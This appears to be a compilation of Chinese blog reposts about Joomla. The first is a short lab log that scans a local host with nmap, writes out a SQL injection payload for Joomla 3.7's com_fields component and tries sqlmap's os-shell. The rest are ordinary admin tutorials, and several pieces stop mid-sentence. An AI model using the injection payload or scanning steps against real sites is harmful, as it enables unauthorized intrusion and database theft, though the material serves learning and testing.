Joomla

1.日常扫描 nmap -sP -PI 192.168.2.0/24 -T4 是134这个地址 nmap -A -p- 192.168.2.134 2.joomla 1)版本扫描 joomla 3.7这个版本有个sql注入漏洞 poc /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1) 2）漏洞确认 上sqlmap 探测到是dba,试试os-shell 不行，害 跑了下，注射到字段，出不来字段名，有点蒙逼 来个好人救救可怜的博主吧，害 来源： oschina 链接： https://my.oschina.net/u/4412419/blog/4410203

有时，您安装了Joomla扩展程序，并且Joomla管理员面板崩溃了。您想立即卸载此扩展程序，但您的Joomla管理员面板无法操作。你该怎么办？ 在这种情况下，您的解决方案是手动删除此扩展名。 让我们更详细地看一下这个过程。就本教程而言，我将删除一个组件。学习了如何手动删除Joomla组件后，您将可以应用相同的步骤删除Joomla模块或Joomla插件。 删除文件夹和文件 最重要的步骤是删除扩展名的文件： 打开您的Joomla网站的文件结构。使用主机控制面板中提供的文件管理工具中的一种FTP客户端。 转到/ administrator / components /并找到您的Joomla组件。 删除您的组件。 转到/ components /并删除您的组件。 转到/ media /并检查是否在其中找到了组件。 转到/ modules /文件夹，并检查它是否包含名为mod_ [your-component-name]的文件夹。 对/ plugins /文件夹运行相同的步骤。 额外步骤：删除数据库中的数据 下一步不是100％必要的。但是，我们已将其包括在内，以防万一您对这件事有些偏执。您也可以从数据库中删除扩展数据。 在您的托管帐户中，打开phpMyAdmin数据库管理工具。 在左侧面板中，单击您的Joomla站点的数据库名称。 您将看到所有数据库表。删除所有包含要删除的扩展名的表。

Joomla 4 管理模板的界面已发生重大变化， 更加用户友好。因此，它为您的控制面板带来了高级外观。 现在，让我们看看它们之间的区别。 Joomla 4管理模板中的设计 登录页面 下图是登录页面的新外观。与新模式集成后，登录页面将比旧模式更加优雅，用户可以为其网站设置logo和站点名称。如果您不想更改logo，则登录表单上方仍会带有白色横幅。 风格 在Joomla 4管理模板中使用了新的基本字体Roboto，因为该字体提供了足够的可读性，包括Thin，Light，Regular，Medium，Bold和Black weight样式。 色彩 更具体地说，侧栏的颜色更改为深蓝色，代替了酷蓝色。另外，浅灰色用于整个用户界面，而不是Joomla 3中的浅蓝色背景。 内容管理 文章编辑屏幕外观简洁，并添加了“ CMS内容 ”选项，其中包括有关编辑内容的所有其他功能。 媒体 Joomla 4已升级了媒体管理器中的功能。与Joomla 3相比，新的媒体管理器添加了更多附加功能来帮助用户管理媒体文件。 模块 在Joomla 4中，扩展菜单被删除，因此“ 模块”菜单移至“ 内容 ”选项，并将其名称更改为“ 站点模块 ”。此外，您还可以通过单击复选图标来更改模块的状态。 系统设置 该系统设置页面是Joomla管理界面，其中包含用于设置，安装，模板，访问级别，缓存，更新和管理的所有配置选项。在此页面上

本教程说明了如何从 Joomla 中的URL中删除index.php。 首先，为了从网址中删除index.php，您应该在Joomla中启用“使用网址重写”。并将htaccess .txt 重命名为.htaccess 要在Joomla中启用“使用URL重写”，您应该执行以下操作： 登录到您的Joomla 仪表板；登录到您的Joomla 仪表板； 在左侧菜单中，单击系统选项卡下的全局配置链接； 页面顶部有几个选项卡，请单击“网站”。 在页面右侧，找到SEO设置； 将使用URL重写选项设置为是 ; 注意：如果使用Apache服务器，请确保已在主机帐户上安装并启用了mod_rewrite。连接到您的FTP服务器，将htaccess .txt文件重命名为.htaccess。 如果您使用IIS 7服务器，请确保为您的托管帐户启用了IIS URL重写模块。在激活使用URL重写选项之前，将web.config.txt文件重命名为web.config。 将“页面标题中包含站点名称”设置为“之后”； 然后点击左上方菜单中的保存； 来源： oschina 链接： https://my.oschina.net/u/3761169/blog/4319413

>作者 谢恩铭，公众号「程序员联盟」（微信号：coderhub）。 转载请注明出处。 原文： https://www.jianshu.com/p/0038473f34cb > 《Web探索之旅》 全系列 内容简介 前言 框架和内容管理系统 总结 第二部分第四课预告 1. 前言 上一课 Web探索之旅 | 第二部分第二课：服务器语言 中，我们介绍了服务器端的编程语言，有 PHP，Java，Python，Ruby，C#，Go，等等。 这一课我们来学习基于这些语言衍生出来的框架（Framework），然后再看看什么是内容管理系统（CMS）。 2. 框架和内容管理系统 框架（Framework） 什么是 Framework（框架）呢？ framework 在英语中是“框架，骨架；结构，构架”的意思。 要对 Framework 给出一个准确的定义很难，因为有几种不同的定义。可以参看这个百度百科： 框架 。 不过我想给它一个简单，也许并不十分准确的形象表述： >Framework 就好比一个超级工具箱。如果纯用编程语言可以解决问题，那么框架则帮助我们“站在巨人的肩膀上”，使用别人已经写好的基于某种或某几种编程语言的一个架构，更快速地解决问题。 或者如果把编程语言比喻成基本的原料，如木头，钢铁等，那么框架就像榔头，剪刀这样的由基本原料制作成的工具，可以为我们实现更复杂的东西。 所以，既然我们有

如果您打算建立一个Joomla博客，则可能正在寻找最好的Joomla博客扩展，它可以通过列表，作者博客，评论等附加功能帮助您轻松发布和管理网站内容。 从我们的角度来看，本文将重点介绍8种最佳的Joomla博客扩展，以节省您的研究时间。它们中的大多数非常受欢迎，让我们看一下。 K2-最好的免费Joomla博客扩展 K2拥有350万次下载量，是该列表中最受欢迎的扩展程序，并且完全免费。但是，该扩展程序可以提供许多强大的功能，不仅可以节省您的钱，而且K2还可以在无需任何技术技能的情况下轻松使用，节省您的工作量。K2应当提到的功能是带有访问控制的前端提交，通过标签列出的文章，类别和作者，丰富的项目内容表单，强大的内容模块，拖放式媒体管理器等等。 该扩展程序还允许用户创建无限的模板并分配给类别。此外，K2提供了扩展的用户配置文件，用户组，博客，并且有许多Joomla模板和插件对此扩展进行了兼容设计，从而改善了前端显示和自身的功能。 WordPress for Joomla-完美匹配 对于初学者或博主而言，WordPress是众所周知的最佳博客内容管理系统，他们不具备较高的技术技能，因为它易于使用，并且此CMS的核心功能旨在支持博客网站。因此，如果您需要使用旨在极大地管理强大扩展的CMS Joomla来构建具有类似WordPress配置的专业博客网站，那么WordPress for

本教程介绍了如何在Joomla中启用和管理“搜索” 模块。 Joomla搜索模块使您可以在类别，联系人，文章，新闻源，Web链接之间进行搜索。您可以通过Joomla管理面板设置模块： 1.导航到Joomla管理面板，转到扩展-> 模块管理器 选项卡。单击“ 新建”，然后从模块列表中选择“ 搜索 ”。 2.填写标题字段，将状态设置为已发布。其余字段是可选的。框标签是出现在搜索框标签中的文本。 框宽字段定义“搜索”字段中的字符数。该框文本是文本显示了在该领域默认内容。单击“ 保存”或“保存并关闭”按钮以发布模块： 3.您可能还需要编辑“ 搜索结果”页面： 导航到Joomla管理面板中的组件->搜索 标签，以维护搜索结果和搜索统计信息。单击右上角的“ 选项”按钮以查看可用的选项。 4.在收集搜索统计领域允许检查什么样的信息用户在您的网站上寻找。 在使用搜索领域领域允许启用/禁用类别，联系人，文章，新闻推送，网络链接中进行搜索。 您可以使用“ 创建日期”选项来显示或隐藏在搜索结果中创建文章的日期： 5.在搜索组件中保存更改时，您将被重定向到“搜索管理器：搜索词分析”页面。如果“收集搜索统计信息”设置为“是”，则您会看到“ 搜索短语，命中和结果 ”列表。要显示返回给用户的结果数，请单击页面顶部的显示搜索结果按钮。左上角的重置按钮将清除页面上的搜索统计信息： 来源： oschina 链接：

在本教程中，我们将向您展示如何从站点管理员面板中编辑Joomla模板文件。 1.登录到Joomla管理员面板后，您需要导航至扩展 > 模板部分。 2.在下一个窗口中，再次从左侧列表中选择模板，然后单击指向您的主题文件的链接。通常将其命名为ThemeXXXX，其中XXXX是主题编号。 3.现在在左侧文件位置，您可以看到模板文件和文件夹的列表。在这里，您可以编辑CSS文件，检查已安装的字体列表，查看模块的编码等。 注意！除非您具有高级编程技能，否则请勿在管理面板中编辑PHP文件。建议使用FTP，因为即使在PHP语法中犯了一个小错误，也可能会关闭您的网站，并且您将无法通过管理面板恢复所做的更改。 现在，您知道如何在Joomla管理面板中访问模板文件并进行编辑。 来源： oschina 链接： https://my.oschina.net/u/4304562/blog/4302508

如何在移动设备上隐藏Joomla模块，您经常会发现自己想要隐藏手机，iPad设备上的某些模块。您很可能会考虑这些模块的重要性较低，并希望避免用户在到达您认为相关的区域之前必须向下滚动冗长的内容页面。或者，您可能希望将模块替换为内容更适合于较小屏幕设备的其他模块。值得庆幸的是，自从Bootstrap引入Joomla以来，现在这很容易做，因为Bootstrap为此目的提供了一些类。 可以通过Joomla模块设置中可用的“模块类后缀”字段将这些类添加到模块中。无论您在此字段中添加什么内容，都将将该类名添加到模块的周围div中，因此将该类的属性应用于整个模块。只需导航至模块管理器（扩展->模块管理器），然后单击即可。进入模块设置后，选择“高级”标签。然后，您可以根据希望在每个屏幕尺寸上显示模块的方式，将相关的类添加到“模块类后缀”字段中。 小型设备电话（小于768像素） hidden-phone 小型设备平板电脑（≥768px） hidden-tablet 中型设备台式机（≥992px） hidden-desktop 请注意，根据您的Joomla模板，您可能需要在该字段的第一个类之前添加一个空格，以使其正常运行。 单击“保存”，仅此而已。现在，您可以通过刷新页面并将浏览器窗口调整为必要的屏幕尺寸或在相应设备上打开页面来测试您的网站。 来源： oschina 链接： https://my

本教程显示了如何在Joomla中显示特色文章。 首先，您需要将网站中的某些文章标记为“精选”。 第一步 为此，请转到内容->文章管理器。这里有您所有文章的清单。您会在每篇文章旁边看到一个星星。要将文章标记为精选，只需按一下文章旁边的星号即可。它将变为黄色，表示您已将本文标记为特色： 第二步 为了在页面上显示特色文章，您必须在Joomla中创建“ 特色文章”菜单类型。（或者模块） 第三步 进入菜单->主菜单（默认主菜单）->添加新菜单项： 第四步 接下来，我们应该通过按菜单项类型标签旁边的选择按钮来选择菜单类型。展开“ 文章”部分，然后选择“ 特色文章”选项： 最后，按此页面左上角的保存按钮。 现在检查您的站点，您将看到显示特色文章的新菜单项。 来源： oschina 链接： https://my.oschina.net/u/3761169/blog/4316019